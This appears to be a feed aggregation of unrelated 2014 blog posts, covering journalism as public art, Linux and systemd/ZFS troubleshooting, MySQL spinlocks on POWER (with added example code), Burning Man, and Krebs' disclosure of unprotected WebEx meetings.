    Early experiments show a need for journalism to leap off the page, phone, and tablet and into other types of spaces. The “Reveal” project from the New York Times R & D lab placed news, weather, and biometric data like a user’s weight and heart rate into a tricked out mirror.

    [Video: http://www.youtube.com/embed/pZkdSqueU-I]

    The team started this project to “to explore how the relationship between information and the self is evolving.” So information moved from pages to personalized surfaces. But where else?

    In response to the ongoing debates around net neutrality, activists from Fight for the Future took the story to the streets. Erecting a billboard and speakers, they blared John Oliver’s 15 minute monologue around the FCC to the front doors of the building – alerting passersby to both the story and the need for action.

    [Video: http://www.youtube.com/embed/fpbOEoRrHyU]

    But how else can we transport a story?

    The MIT Media Lab grew a small experiment into an interactive art display, where even the spokes of a bike passing you on the street can deliver a message and tell a story.

    [Video: http://www.youtube.com/embed/z0eoxaZiEic]

    Don’t be fooled by the grand look of many of these projects. These types of innovation in journalism are possible because of the change in consumer technology.

    My Knight Project at Stanford focused on creating interactive public spaces with the most powerful tools we can already fit into our pockets. And with a few small additions, you can create a mobile interaction space with tools that fit in your backpack. With sensors like the Kinect, bluetooth speakers and mini projectors, a story can live anywhere.

    The mobile projection kit. Photo by Sam Stewart.


    Like here – Luminous Intervention, an activist group in Baltimore, had a major idea: to draw attention to the growing number of people without shelter. The simple solution? To project people under this road where drivers and passersby could see it.

    Luminous Interventions


    Raising awareness, and making a public statement was not limited to an op-ed or a flyer. The statement – and the story – became part of the visual environment.

    We can also foster community reactions to popular news stories. This image, also from Luminous Interventions, took the Occupy Movement and put it on the streets of Baltimore, in an accessible way to spark community dialogue and conversation. There was no need for people to go anywhere to engage – the conversation happened in their streets, on their block.

    Luminous Intervention


    And most recently, in St. Louis, Missouri, activists have used their cell phones and projections to take the news to city hall – literally. Kajieme Powell was shot and killed by police officers, within the same month as Michael Brown’s death in Ferguson, Missouri. Here, citizens ensured that this event was not forgotten by looping the video.


    My friend and co-fellow Mariam Seeman urged journalists to adopt a new framework for reporting – to go from storytelling to storyliving:

    [Video: http://www.youtube.com/embed/bJEedgkLYOE]

    This action is how we live a story.

    To move storyliving even further, journalist and artist Nonny De La Pena creates what she calls immersive journalism experiences. She hacked together a virtual reality kit using an open source video game platform called Unity. From that base, she’s been able to explore a multitude of news stories – and picked up an Indiecade impact award this weekend for expanding the scope of games. She’s explored issues like Hunger in Los Angeles and the experiences of prisoners in Guantanamo Bay. One of her latest projects focuses on Syria – let’s experience a little of what de la Pena creates:

    [Video: http://www.youtube.com/embed/HtZrSb84JPE]

    And with the advent of personal virtual reality technology, like Oculus Rift, these types of complex experiences will soon be seen in the comfort of your own home.

    One of the final elements of storyliving is social exchange. While most understand the need for social media as a way of promoting work, there is still so much potential in creating multifaceted stories with varying narratives in real time. The Question Bridge project, from Hank Willis Thomas and Chris Johnson does just that – by using devices like iPads and phones to allow viewers to see the project, ask a question, and record their own responses, becoming part of the conversation in a way that’s deeper than an interview filtered through a third party.

    [Video: http://www.youtube.com/embed/kNartlSyA1s]

    These were just a few of the many ideas influencing journalism right now. But it’s easy to see that the most interesting aspects of journalism’s evolution look a lot like art – putting ideas, people, and the public first. Thank you.

    The post #GIA14: Journalism as Public + Art appeared first on Racialicious - the intersection of race and pop culture.

    Planet Linux AustraliaAndrew Pollock: [life] Day 258: Kindergarten, demonstrations and play dates

    I had my second Thermomix demonstration this morning. It was a decent drive away from home, and in my thoroughness to be properly prepared, I somehow managed to misjudge the time and arrived an hour earlier than I needed to. Oops.

    It was good to have the additional time up my sleeves though, and I was happy with how the demonstration went, and it left me with a comfortable amount of time to get to Kindergarten to pick Zoe up. It did completely wipe out the day though.

    Zoe wanted to watch Megan's tennis class, so I left her with Jason while I popped home to get changed, and then came back in time for the conclusion of tennis class.

    Zoe wanted Megan to come over for a play date, so I took Megan back to our place, and the girls had a great afternoon on the balcony doing some self-directed craft. I used the time to play catch up and make a bunch of phone calls.

    It wasn't until after Sarah picked up Zoe that I realised I'd barely interacted with her all afternoon though, which was a bit of a shame. I'll be happy once this sausage sizzle on Saturday is done, and the pace of life should slow down a bit more again.

    It was a bit of a struggle to force myself to go to yoga class tonight, but I'm glad I did, because it was a really great class.

    Planet Linux AustraliaAndrew Pollock: [life] Day 257: Kindergarten, meetings, and scrounging for sausages

    Zoe's Kindergarten has scored the fundraising sausage sizzle rights to the local Councillor's next Movies in the Park event. Since I've been the chairperson of the PAG, which doesn't seem to actually involve much other than being cheerleader in chief and chairing monthly meetings, I thought I'd lend the fundraising committee a hand with the organising of this event. The fundraising committee have worked their butts off this year.

    After I dropped Zoe at Kindergarten, I went to the home of one of the committee members and met with the committee to discuss logistics for the upcoming sausage sizzle. I'd previously volunteered to try and get a donation of sausages from a local butcher, but hadn't had a chance to do that yet.

    After taking a bus into the city and back for a lunch meeting, and picking up Zoe from Kindergarten afterwards, we set out on a tour of all the local supermarkets and butchers, with an official letter in hand from the Kindergarten.

    We were unlucky on all fronts, but Zoe did score a free cheerio at one butcher, so she was pretty happy. Driving all over the place ate up most of the afternoon.

    Anshu dropped in after work not long after we got home, and then Sarah arrived not long after that to pick up Zoe.

    CryptogramSurveillance in Schools

    This essay, "Grooming students for a lifetime of surveillance," talks about the general trends in student surveillance.

    Related: essay on the need for student privacy in online learning.

    Worse Than FailureBazooka Proof

    Back in early 2000, Clint interviewed for a position as a software developer for a mid-sized engineering company of about 200-plus people somewhere in the deserts of Kerblekistan, located in very close proximity to the Elbonian mud fields. Everyone there, especially the women, was used to living in harsh conditions, and had grown extremely rugged as a result. The Kerblekistanis and Elbonians had been enjoying an uneasy peace, but kept a wary eye out for less-than-peaceful activities...

    During the interview, the development team was ready to hire him when one of the bosses burst into the room and interrupted the interview to introduce himself. When he discovered that Clint had an IT background, he became very excited. They temporarily needed a network administrator until they could hire someone permanently, so for the first three months, Clint was assigned to be a network admin.

    To further complicate things, the team was moving to a new office. Two new network administrators were hired, one of which Clint had worked with elsewhere. Since both had extensive experience in managing office moves, they were given the task of continuing to coordinate that, while Clint maintained the day to day network tasks. Since the new guys would ultimately be running the network, he gave them the luxury of modifying some of the plans to suit themselves.

    A few weeks before the move when it was time to get the communications set up, there arose a heated debate between the two admins about where to set up the servers.

    The new office had two floors. On the lower floor, a receptionist who was built like a tank and could have single handedly replaced the Pittsburgh Steel Curtain, sat directly in front of the main entrance. She was the secretary, receptionist and security. Right behind her was a large air conditioned area where power and communications came into the building. Directly above this room was a small office without any special A/C, power or communications set-ups, which was to be the administrators' office. Before the two admins were hired, Clint had placed several server racks in the big room downstairs.

    Both new admins had installed the racks, but new admin B was not happy; he wanted the server racks to be installed in the small room on the second floor (the new IT office). Admin A wanted them left downstairs where they were already located because the small office upstairs was barely big enough for two people, let alone several racks of noisy servers, plus A/C that would have to be added.

      Admin-B: We can't have these racks downstairs; what if the Elbonians attack 
               through the front door?
      Admin-A: The receptionist is in front of the door, and nobody gets 
               past her without a pass!
      Admin-B: These racks need to be upstairs; this way if the server room is 
               destroyed, they'll be safe - with us
      Admin-A: If the room downstairs blows up, what makes you think we will survive 
               directly above it? Besides, how much damage can a wad of mud really do?
      Admin-B: But they've been ramping up their weapons and supplies; we need to be ready!
      ...
    

    The debate was still raging when Clint arrived at the new office with two owners of the company (one Elbonian, one Kerblekistani) in tow, to check on things. Neither admin noticed Clint or the owners walk in.

      Admin A: There is no security issue. These doors are solid and they lock!
               The servers are not going to be any more secure on the second floor.
      Admin B: (sounding like a belligerent child)
               Yes, but those doors are not bazooka-proof. The owners are Elbonian 
               and Kerblekistani - you never know what might happen!
    

    Rather than take offence, both owners decided to have some fun with the situation...

      Owner E: Our mud-bombs could certainly penetrate this door!
      Owner K: Perhaps, but you'll never get them past my secretary - 
               Nothing gets past her - NOTHING!
      Admin A: Um, what the f...?!
      Admin B: Now do you see why we need to keep these servers upstairs?
      Owner E: I am positive our new Mud-a-Pult™ has both the range and 
               power to penetrate the upstairs office
      Owner K: Then I suppose I'll have to call up the reserves from the office pool
               to back up my secretary
      Admin B: (sounding significantly less belligerent)
               W..W..Wait - are you serious?
    

    As the owners wandered away while pretending to still argue, Clint brokered a compromise where only the rack with the more important mission-critical servers was to be located in the upstairs office, safe from the mud-people. The other servers would stay in the server room, protected by the locked door, and the receptionist, who thankfully would never know that she was the first line of defense.

     

    Photo credit: Foter / CC BY

    Debian Administration Setting up your own graphical git-server with gitbucket

    This article documents the process of configuring a git host, using gitbucket, which will give you a graphical interface to a collection of git repositories, accessible via any browser, along with support for groups, issues, and forks.

    Planet Linux AustraliaLev Lafayette: Linux and Windows 8 Dual Boot : A Brief How-To

    As regular readers would know, I make some effort to avoid using closed-source and proprietary software. This includes that popular operating system common on laptops and servers, MS-Windows. However there are a small number of reasons why this O.S. is required, including life-saving medical equipment hardware which, for some unfathomable reason, has been written to only interface with proprietary operating systems. Open source developers?


    Planet Linux AustraliaStewart Smith: MariaDB Foundation board

    There seems to be a bit of an exodus from the MariaDB Foundation board recently… I’m not sure exactly what to make of it all, but the current members according to https://mariadb.org/en/foundation/ are:

    • Rasmus Johansson (chair)
    • Michael “Monty” Widenius
    • Jeremy Zawodny
    • Sergei Golubchik

    With Jeremy Zawodny being the only non-MariaDB Corp member.

    Recently, Jeremy Cole asked some people about their membership:

    I’m a little worried for the project, the idea of a foundation around it and for people I count as friends who work on MariaDB.

    Planet Linux AustraliaStewart Smith: MySQL 5.7.5 on POWER – thread priority

    Good news everyone!

    MySQL 5.7.5 is out with a bunch more patches for running well on POWER in the tree. I haven’t yet gone and tried it all out, but since I’m me, I look at the bugs database and git/bzr history first.

    On Intel CPUs, when you’re spinning on a spin lock, you’re meant to execute the PAUSE CPU instruction. This tells the CPU that other execution threads in the same core should be given priority as you are currently not doing anything productive. Without this, you’re likely going to hurt on hyperthreaded CPUs.

    In MySQL, there are custom spinlocks in order to do interesting adaptive mutex things to attempt to squeeze the most performance possible out of modern systems.

    One of the (not 100% ready, but close) bugs with patches I submitted against MySQL 5.7 was for using the equivalent of the PAUSE instruction for POWER CPUs. On POWER, we’re a bit different, you can actually set priorities of threads (which may matter more, as POWER8 CPUs can be in SMT8 mode – where there are *eight* executing threads per core).

    So, the good news is that in MySQL 5.7.5, the magic instructions for setting thread priority are in! This should mean great things for performance on POWER systems with any of the SMT modes enabled.

    The next interesting part of this is how it interacts with other KVM guests on a system. At least on POWER (and on x86 as well, although I won’t go into details here) there’s a hypervisor call that a guest can make saying “hey, I’m spinning here, perhaps you want to make sure other vcpus execute so that at some point I can continue”. On POWER, this is the H_CONFER hcall, where you can basically do a directed yield to another vcpu (the one that holds the lock you’re trying to get is a good idea).

    Generally though, it’s only the guest kernel that does this, not userspace. You can see the H_CONFER call in __spin_yield(arch_spinlock_t*) and __rw_yield(arch_rwlock_t*) in arch/powerpc/lib/locks.c in the kernel.

    It would be interesting to see what extra we could get out of a system running multiple guests with MySQL servers if InnoDB/MySQL could properly yield to the right vcpu (well, thread I guess).
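    The spin-wait hints described above, as an added example (not MySQL's or InnoDB's code): a bounded test-and-test-and-set spinlock that issues PAUSE on x86 and, on POWER, drops SMT thread priority while spinning and restores it afterwards. The `demo_*` names and `SPIN_*` macros are hypothetical; the POWER hints are the `or 1,1,1` / `or 2,2,2` priority nops the Linux kernel uses as HMT_low and HMT_medium.

```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

/* Spin-wait hints, selected at compile time (macro names are hypothetical). */
#if defined(__x86_64__) || defined(__i386__)
  /* PAUSE: hint that the sibling hyperthread should get the core's resources. */
  #define SPIN_BEGIN() ((void)0)
  #define SPIN_RELAX() __asm__ __volatile__("pause" ::: "memory")
  #define SPIN_END()   ((void)0)
#elif defined(__powerpc__) || defined(__powerpc64__)
  /* POWER: lower this hardware thread's SMT priority for the whole wait,
   * then put it back to medium before doing real work again. */
  #define SPIN_BEGIN() __asm__ __volatile__("or 1,1,1" ::: "memory")
  #define SPIN_RELAX() __asm__ __volatile__("" ::: "memory")
  #define SPIN_END()   __asm__ __volatile__("or 2,2,2" ::: "memory")
#else
  /* Unknown architecture: compiler barrier only. */
  #define SPIN_BEGIN() ((void)0)
  #define SPIN_RELAX() __asm__ __volatile__("" ::: "memory")
  #define SPIN_END()   ((void)0)
#endif

typedef struct {
    atomic_int locked; /* 0 = free, 1 = held */
} demo_spinlock;

static void demo_spin_init(demo_spinlock *l)
{
    atomic_init(&l->locked, 0);
}

/* One acquisition attempt; acquire ordering on success. */
static bool demo_spin_trylock(demo_spinlock *l)
{
    int expected = 0;
    return atomic_compare_exchange_strong_explicit(
        &l->locked, &expected, 1,
        memory_order_acquire, memory_order_relaxed);
}

/*
 * Spin for at most max_spins rounds, as an adaptive mutex would before
 * falling back to sleeping. Returns the number of rounds spent waiting
 * on success, or -1 if the budget ran out and the caller should block.
 */
static long demo_spin_lock_bounded(demo_spinlock *l, long max_spins)
{
    long spins = 0;
    bool acquired = false;

    if (demo_spin_trylock(l))
        return 0; /* uncontended fast path: no hint needed */

    SPIN_BEGIN();
    while (spins < max_spins) {
        /* Read-only check first so waiters do not bounce the cache line
         * with failed compare-and-swap attempts. */
        if (atomic_load_explicit(&l->locked, memory_order_relaxed) == 0 &&
            demo_spin_trylock(l)) {
            acquired = true;
            break;
        }
        SPIN_RELAX();
        spins++;
    }
    SPIN_END(); /* always restore priority, whether or not we got the lock */

    return acquired ? spins : -1;
}

static void demo_spin_unlock(demo_spinlock *l)
{
    atomic_store_explicit(&l->locked, 0, memory_order_release);
}

int main(void)
{
    demo_spinlock lock;
    demo_spin_init(&lock);

    printf("uncontended: %ld\n", demo_spin_lock_bounded(&lock, 1000));
    /* The lock is still held, so this attempt exhausts its spin budget. */
    printf("held:        %ld\n", demo_spin_lock_bounded(&lock, 1000));
    demo_spin_unlock(&lock);
    printf("released:    %ld\n", demo_spin_lock_bounded(&lock, 1000));
    demo_spin_unlock(&lock);
    return 0;
}
```
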

    ,

    Planet DebianPhilipp Kern: pbuilder and pam_tmpdir

    It turns out that my recent woes with pbuilder were all due to libpam-tmpdir being installed (at least two old bug reports exist about this issue: #576425 and #725434). I rather like my private temporary directory that cannot be accessed by other (potential) users on the same system. Previously I used a hook to fix this up by ensuring that the directory actually exists in the chroot, but somehow that recently broke.

    A rather crude but working solution seems to be "session required pam_env.so user_readenv=1" in /etc/pam.d/sudo and "TMPDIR=/tmp" in /root/.pam_environment. One could probably skip pam_tmpdir.so for root, but I did not want to start fighting with pam-auth-update as this is in /etc/pam.d/common-session*.

    LongNowLarry Harvey Seminar Primer

    On Monday, October 20th, Larry Harvey speaks for Long Now on “Why The Man Keeps Burning,” as part of our monthly Seminars About Long-term Thinking. Each month the Seminar Primer gives you some background about the speaker, including links to learn even more.

    Burning Man started with humble beginnings in 01986 with 20 people on a beach. Twenty-eight years later, it’s one of the premier arts festivals in the country, with over 66,000 people attending annually, dozens of satellite events, and a vibrant international community. In one sense, Burning Man is an event that only happens for one week per year in a remote desert in Nevada. In another sense, it’s a massive global phenomenon that supports thousands of artists, causes, and technologies.

    What sets Burning Man apart from other large-scale festivals is its focus on participation. The organizers set up the infrastructure of “Black Rock City” (including roads, portapotties, ice, DMV, medical, post offices, etc.) and then attendees become the citizens and bring life to the desert through hundreds of art pieces, mutant vehicles, and theme camps. This personal investment of time, money and creativity by participants far exceeds what the festival organizers could do if they were planning the Burning Man event in the traditional sense.

    How does something as outrageous as a temporary city of art built in the middle of the desert come about? It all began on a small beach in San Francisco and an “event” organized by Larry Harvey and a group of his artist, prankster friends. In 01986 the first wooden figure they built was only 8-feet tall. The attendees were all members of the San Francisco Cacophony Society, a group of artists and mischief makers also associated with Santarchy, urban exploration, and Art Cars. The beach version of Burning Man became an annual event, but was subsequently shut down by local authorities.

    Harvey and others made the decision to relocate the event to the dramatic but inhospitable environment of the Black Rock Desert in Pershing County, Nevada. This changed the scale of the event and opened up a world of possibilities for Burning Man to become the festival it is today. It has grown in size, budget, ambition, and notoriety virtually every year since moving to Nevada. Along the way it went legit, fully permitted and coordinated with county governments and the Bureau of Land Management.

    And through it all Larry Harvey has been a part of steering and scaling up this arts oasis in the desert. He serves as Burning Man’s Chief Philosophical Officer and authored the Ten Principles in 02004, guidelines which reflect “the community’s ethos and culture” and assure Burning Man a reference point as it grows in Black Rock and all over the world. Harvey continues also as founding Board Member of the Burning Man Art Project and Chairman of the Board of the Black Rock Arts Foundation.

    [Video: http://www.youtube-nocookie.com/embed/xxRAg9Pcpm4?rel=0]

    There have been rough spots along the way, as the man has grown from eight to over 100 feet and a 20 person party on the beach has become 60,000+ paying hundreds of dollars per ticket. Over the years much has changed and many issues have stirred concern in the community that the festival could be destroyed by some new policy or other development: “Scaling up will kill Burning Man.”  “That new rule will kill Burning Man.”  “The Bureau of Land Management will kill Burning Man.”  “Selling tickets that way will kill Burning Man.”  “Board infighting will kill Burning Man.”  “Upscale turnkey camps will kill Burning Man.”

    It turns out none of these things killed Burning Man, and Burning Man shows few signs of slowing down. The Black Rock Arts Foundation (BRAF) gives hundreds of thousands of dollars in grants every year to Burning Man projects as well as public art projects in San Francisco and around the world. The “regional burns” have created strong communities globally based around smaller satellite festivals which take cues from the Ten Principles.

    A few examples of the art that BRAF has helped make possible:

    The Raygun Gothic Rocketship in San Francisco by Five Ton Crane (5TC) photo by David Yu

    Flaming Lotus Girls’ Soma at Burning Man photo by Scott Hess

    From Market Street Blooms by Karen Cusolito at UN Plaza, San Francisco photo by George Post

    The Bottlecap Gazebo by Max Poynton and Andrew Grinberg in Fernley, Nevada; photo courtesy of Jerry Mansker

    Join us on Monday, October 20th at SFJAZZ Center as Larry Harvey, who has been there from the beginning to the present, tells the story of Burning Man and shows us how we can find long-term thinking in a reoccurring temporary city.

    This Seminar is sold out, but there will be a walk-up line for released tickets.

     

    Planet DebianKonstantinos Margaritis: SIMD optimizations, cont.

    A friend of mine told me that I should advertise my passion and know-how about SIMD more, and I decided to follow his advice. Though I am terrible at marketing and even more at personal marketing, I've made an attempt to do just that, advertise the fact that I'm offering SIMD Optimization Services (with emphasis on PowerPC AltiVec/VMX/VSX, and ARM NEON, but I'm ok with SSE as well, the logic is pretty much the same, though the difference(s) are in the details). For this reason I'm offering a free evaluation of your performance critical code (open/closed, able to sign NDAs if needed) to let you know if it's worth optimizing it, what kind of a performance gain you would get and how much it would cost you to get that result.
    You can read more here.

    Planet DebianJohn Goerzen: Update on the systemd issue

    The other day, I wrote about my poor first impressions of systemd in jessie. Here’s an update.

    I’d like to start with the things that are good. I found the systemd community to be one of the most helpful in Debian, and #debian-systemd IRC channel to be especially helpful. I was in there for quite some time yesterday, and appreciated the help from many people, especially Michael. This is a nontechnical factor, but is extremely important; this has significantly allayed my concerns about systemd right there.

    There are things about the systemd design that impress. The dependency system and configuration system is a lot more flexible than sysvinit. It is also a lot more complicated, and difficult to figure out what’s happening. I am unconvinced of the utility of parallelization of boot to begin with; I rarely reboot any of my Linux systems, desktops or servers, and it seems to introduce needless complexity.

    Anyhow, on to the filesystem problem, and a bit of a background. My laptop runs ZFS, which is somewhat similar to btrfs in that it’s a volume manager (like LVM), RAID manager (like md), and filesystem in one. My system runs LVM, and inside LVM, I have two ZFS “pools” (volume groups): one, called rpool, that is unencrypted and holds mainly the operating system; and the other, called crypt, that is stacked atop LUKS. ZFS on Linux doesn’t yet have built-in crypto, which is why LVM is even in the picture here (to separate out the SSD at a level above ZFS to permit parts of it to be encrypted). This is a bit of an antiquated setup for me; as more systems have AES-NI, I’m going to everything except /boot being encrypted.

    Anyhow, inside rpool is the / filesystem, /var, and /usr. Inside /crypt is /tmp and /home.

    Initially, I tried to just boot it, knowing that systemd is supposed to work with LSB init scripts, and ZFS has init scripts with carefully-planned dependencies. This was evidently not working, perhaps because /lib/systemd/systemd/ It turns out that systemd has a few assumptions that turn out to be less true with ZFS than otherwise. ZFS filesystems are normally not mounted via /etc/fstab; a ZFS pool has internal properties about which dataset gets mounted where (similar to LVM’s actions after a vgscan and vgchange -ay). Even though there are ordering constraints in the units, systemd is writing files to /var before /var gets mounted, resulting in the mount failing (unlike ext4, ZFS by default will reject an attempt to mount over a non-empty directory). Partly this is due to the debian-fixup.service, and partly it is due to systemd reacting to udev items like backlight.

    This problem was eventually worked around by doing zfs set mountpoint=legacy rpool/var, and then adding a line to fstab (“rpool/var /var zfs defaults 0 2”) for /var and its descendent filesystems.

    This left the problem of /tmp; again, it wasn’t getting mounted soon enough. In this case, it required crypttab to be processed first, and there seem to be a lot of bugs in the crypttab processing in systemd (more on that below). I eventually worked around that by adding After=cryptsetup.target to the zfs-import-cache.service file. For /tmp, it did NOT work to put it in /etc/fstab, because then it tried to mount it before starting cryptsetup for some reason. It probably didn’t help that the system’s cryptdisks.service is a symlink to /dev/null, a fact I didn’t realize until after a lot of needless reboots.

    Anyhow, one thing I stumbled across was poor console control with systemd. On numerous occasions, I had things like two cryptsetup processes trying to read a password, plus an emergency mode console trying to do so. I had this memorable line of text at one point:

    (or type Control-D to continue): Please enter passphrase for disk athena-crypttank (crypt)! [ OK ] Stopped Emergency Shell.

    And here we venture into unsatisfying territory with systemd. One answer to this in IRC was to install plymouth, which apparently serializes console I/O. However, plymouth is “an attractive boot animation in place of the text messages that normally get shown.” I don’t want an “attractive boot animation”. Nevertheless, neither systemd-sysv nor cryptsetup depends on plymouth, so by default, the prompt for a password at boot is obscured by various other text.

    Worse, plymouth doesn’t support serial consoles, so at the moment booting a system that uses LUKS with systemd over a serial console is a matter of blind luck of typing the right password at the right time.

    In the end, though, the system booted and after a few more tweaks, the backlight buttons do their thing again. Whew!

    Update 2014-10-13: uau pointed out that Plymouth is more than a bootsplash, and can work with serial consoles, despite the description of the package. I stand corrected on that. (It is still the case, however, that packages don’t depend on it where they should, and the default experience for people using cryptsetup is not very good.)
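
    The conditions this post ran into (no fstab entry for a legacy-mounted dataset, a non-empty mountpoint, a masked unit, a missing After= ordering) can be checked statically before a reboot. The script below is an added example, not part of the original post or of the systemd or ZFS packages; the function names and the units/ directory are assumptions for illustration, and the demo tree is constructed.

```shell
#!/bin/sh
# Added example: static checks for the boot-ordering failure modes in the post.
# Function names and the "units/" directory are hypothetical; pass real paths.

# True if the unit file is masked, i.e. a symlink pointing at /dev/null.
unit_is_masked() {
    [ -L "$1" ] && [ "$(readlink "$1")" = "/dev/null" ]
}

# True if the directory exists and holds no entries (dotfiles included).
mountpoint_is_empty() {
    [ -d "$1" ] && [ -z "$(ls -A "$1" 2>/dev/null)" ]
}

# True if FSTAB ($1) has an uncommented "DATASET MOUNTPOINT zfs" entry.
fstab_has_zfs_entry() {
    awk -v ds="$2" -v mp="$3" '
        $1 ~ /^#/ { next }
        $1 == ds && $2 == mp && $3 == "zfs" { found = 1 }
        END { exit (found ? 0 : 1) }
    ' "$1"
}

# True if UNITFILE ($1) lists TARGET ($2) on an After= line.
unit_orders_after() {
    awk -v t="$2" '
        /^After=/ {
            sub(/^After=/, "")
            n = split($0, names, " ")
            for (i = 1; i <= n; i++) if (names[i] == t) found = 1
        }
        END { exit (found ? 0 : 1) }
    ' "$1"
}

# Print one line per finding under ROOT ($1); the return status is the count.
preflight() {
    root=$1
    findings=0
    if ! fstab_has_zfs_entry "$root/etc/fstab" rpool/var /var; then
        echo "fstab: no active 'rpool/var /var zfs' entry"
        findings=$((findings + 1))
    fi
    if ! mountpoint_is_empty "$root/var"; then
        echo "/var: directory is not empty before the dataset is mounted"
        findings=$((findings + 1))
    fi
    if unit_is_masked "$root/units/cryptdisks.service"; then
        echo "cryptdisks.service: masked (symlink to /dev/null), systemd will not start it"
        findings=$((findings + 1))
    fi
    if ! unit_orders_after "$root/units/zfs-import-cache.service" cryptsetup.target; then
        echo "zfs-import-cache.service: no After=cryptsetup.target ordering"
        findings=$((findings + 1))
    fi
    return "$findings"
}

# Constructed sample tree that exhibits all four findings.
demo() {
    d=$(mktemp -d)
    mkdir -p "$d/etc" "$d/var/log" "$d/units"
    printf '%s\n' '# rpool/var /var zfs defaults 0 2' > "$d/etc/fstab"
    ln -s /dev/null "$d/units/cryptdisks.service"
    printf '[Unit]\nAfter=systemd-udev-settle.service\n' > "$d/units/zfs-import-cache.service"
    preflight "$d" || echo "findings: $?"
    rm -rf "$d"
}
demo
```

    Each check only reports a fact about the tree; whether a masked cryptdisks.service is a problem depends on what else is expected to process crypttab on that system.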

    TED12 visions of Brazil, from 12 different creatives

    To introduce the sessions of TEDGlobal 2014, curator Bruno Giussani had an idea: he asked 12 different creative teams to give 12 different visions of Brazil. Below, watch them all in rapid succession.


    Planet DebianSteve McIntyre: Successful Summer of Code in Linaro

    It's past time I wrote about how Linaro's students fared in this year's Google Summer of Code. You might remember me posting earlier in the year when we welcomed our students. We started with 3 student projects at the beginning of the summer. One of the students unfortunately didn't work out, but the other two were hugely successful.

    Gaurav Minocha was a graduate student at the University of British Columbia, Vancouver, Canada. He worked on Linux Flattened Device Tree Self-checking, mentored by Grant Likely from Linaro's Office of the CTO. Gaurav achieved all of his project's goals, and he was invited to Linaro's recent Linaro Connect USA conference in California to meet people and talk about his project. He and Grant presented a session on their work; it was filmed, and video is online. Grant said he was very happy with Gaurav's "strong, solid performance" during the project.

    Varad Gautam was a student at Birla Institute of Technology and Science, Pilani, India. He succeeded in porting UEFI to the BeagleBone Black. Leif Lindholm from the Linaro Enterprise Group was his mentor for the summer. At the end of the summer, Varad delivered a UEFI port ready for booting Linux and his code was included in Linaro's September UEFI release. Leif said that he was "very pleased with Varad's self sufficiency and ability to pick up an entirely new software project very quickly". We were hoping to invite Gaurad to Connect in California also, but travel document delays got in the way. With luck we'll see him at the next Connect in Hong Kong in February 2015.

    Well done, guys! It was great to work with these young developers for the summer, and we wish them lots more success in their future endeavours.

    Google have also just confirmed that they will be running the Summer of Code program again in 2015. I'm hoping that Linaro will be accepted again next year as a mentoring organisation. I'll post more about that early next year.

    Sociological ImagesReported Sex Offenses Rise in Response to Reform at Occidental College

    In 2013, after years of trying to reform the institution from the inside, faculty and students at my college submitted two complaints to the federal government. The combined 330 pages allege sexual harassment, assault, and battery on campus and argue that the college has ignored and silenced victims, mishandled adjudication and, at times, protected men found responsible for assault. We are now under federal investigation.

    Forcibly revealing Occidental College’s failings hasn’t been fun for anyone, but it has changed us. It is now easier to report assaults, we are likely more vigilant about recording those reports, and students have more knowledge about their rights. Here is what happened:

    At The Occidental Weekly, Noel Hemphill writes that reports of sexual offenses have skyrocketed. They rose from 12 in 2011 to 64 in 2013. Over half of the cases reported were of incidents that occurred in previous years. That’s normal — victims often take a year or more to decide to come forward — but may also reflect a new desire by survivors to have their experience recorded in official statistics.

    These numbers are disturbing, but it is unlikely that they reflect a rise in sexual offenses. Instead, they suggest that survivors of assault are feeling more empowered, have greater faith in their institution, and are pushing for recognition and change.

    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at http://thesocietypages.org/socimages)

    Krebs on SecurityWho’s Watching Your WebEx?

    KrebsOnSecurity spent a good part of the past week working with Cisco to alert more than four dozen companies — many of them household names — about regular corporate WebEx conference meetings that lack passwords and are thus open to anyone who wants to listen in.

    Department of Energy’s WebEx meetings.

    At issue are recurring video- and audio conference-based meetings that companies make available to their employees via WebEx, a set of online conferencing tools run by Cisco. These services allow customers to password-protect meetings, but it was trivial to find dozens of major companies that do not follow this basic best practice and allow virtually anyone to join daily meetings about apparently internal discussions and planning sessions.

    Many of the meetings that can be found by a cursory search within an organization’s “Events Center” listing on Webex.com seem to be intended for public viewing, such as product demonstrations and presentations for prospective customers and clients. However, from there it is often easy to discover a host of other, more proprietary WebEx meetings simply by clicking through the daily and weekly meetings listed in each organization’s “Meeting Center” section on the Webex.com site.

    Some of the more interesting, non-password-protected recurring meetings I found include those from Charles Schwab, CSC, CBS, CVS, The U.S. Department of Energy, Fannie Mae, Jones Day, Orbitz, Paychex Services, and Union Pacific. Some entities even allowed access to archived event recordings.

    Cisco began reaching out to each of these companies about a week ago, and today released an all-customer alert (PDF) pointing customers to a consolidated best-practices document written for Cisco WebEx site administrators and users.

    “In the first week of October, we were contacted by a leading security researcher,” Cisco wrote. “He showed us that some WebEx customer sites were publicly displaying meeting information online, including meeting Time, Topic, Host, and Duration. Some sites also included a ‘join meeting’ link.”

    Omar Santos, senior incident manager of Cisco’s product security incident response team, acknowledged that the company’s customer documentation for securing WebEx meetings had previously been somewhat scattered across several different Cisco online properties.  But Santos said the default setting for its WebEx meetings has always been for a password to be included on a meeting when created.

    “If there is a meeting you can find online without a password, it means the site administrator or the meeting creator has elected not to include a password,” Santos said. “Only if the site administrator has elected to allow no passwords can the meeting organizer choose the ability to have no passwords on that meeting.”

    Update, 11:24 a.m. ET: Cisco has published a blog post about this as well, available here.

    TEDBold expeditions: A recap of session 12 of TEDGlobal 2014

    Aakash Odedra performs at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    In the final session of TEDGlobal 2014, Mighty spaces, we take four journeys — three to great expanses in the world, and one into our minds and hearts:

    A low blue haze lights the stage as choreographer Aakash Odedra spins slowly. The light grows and his dance picks up — a mix of classical Indian forms and modern interpretations. Then, from a simple, whirling dance, Odedra’s performance becomes a storm of wind, light and fluttering papers, creating bird-like formations in the air and on the screen behind him — which he controls with a Kinect as he darts through the tempest. Beautiful and dramatic, Odedra’s dance fills the room with its pulsing presence.

    French Buddhist monk Matthieu Ricard has lived as a scientist, an author and the official French translator for the Dalai Lama. After years of talking with leaders, economists and neuroscientists, he believes that however complex the question may be politically, economically or scientifically, the answer boils down to a simple choice of altruism or selfishness. Ask yourself: What would the caring, considerate response be in this situation? Then, do that.

